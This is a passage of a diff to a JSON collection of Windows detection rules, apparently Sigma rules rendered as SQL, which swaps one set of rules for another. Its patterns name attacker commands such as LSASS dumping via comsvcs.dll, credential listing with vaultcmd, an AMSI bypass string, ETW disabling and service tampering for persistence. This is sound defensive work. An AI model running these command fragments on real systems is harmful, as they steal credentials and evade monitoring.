'%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE 
'%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "title": "New Root Certificate Installed Via CertMgr.EXE", + "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "status": "test", + "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_certmgr_certificate_installation.yml" }, { - "title": "Browser Started with Remote Debugging", - "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", - "status": "experimental", - "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "status": "test", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1185" + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine 
LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_remote_debugging.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Detection of PowerShell Execution via Sqlps.exe", - "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", - "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.community", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1127" + "attack.t1036.003" ], "falsepositives": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." 
+ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", - "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "status": "experimental", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll 
%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "Potential Persistence Attempt Via Existing Service Tampering", - "id": "38879043-7e1e-47a9-8d46-6bec88e201df", - "status": "test", - "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the 
service is started or killed as a potential method for persistence.", - "author": "Sreeman", - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE 
'%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "ZxShell Malware", - "id": 
"f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "status": "experimental", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_mssql_susp_child_process.yml" }, { - "title": "Windows Credential Manager Access via VaultCmd", - "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", + "id": "92a974db-ab84-457f-9ec0-55db83d7a825", "status": "experimental", - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", - "author": "frack113", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vaultcmd_list_creds.yml" + "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", - "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", 
"attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1036" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Query Usage To Exfil Data", + "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "status": "experimental", + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' 
AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_query_session_exfil.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "title": "Conhost Spawned By Uncommon Parent Process", + "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": "Nasreddine 
Bencherchali (Nextron Systems)", + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", + "author": "Tim Rauch", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE 
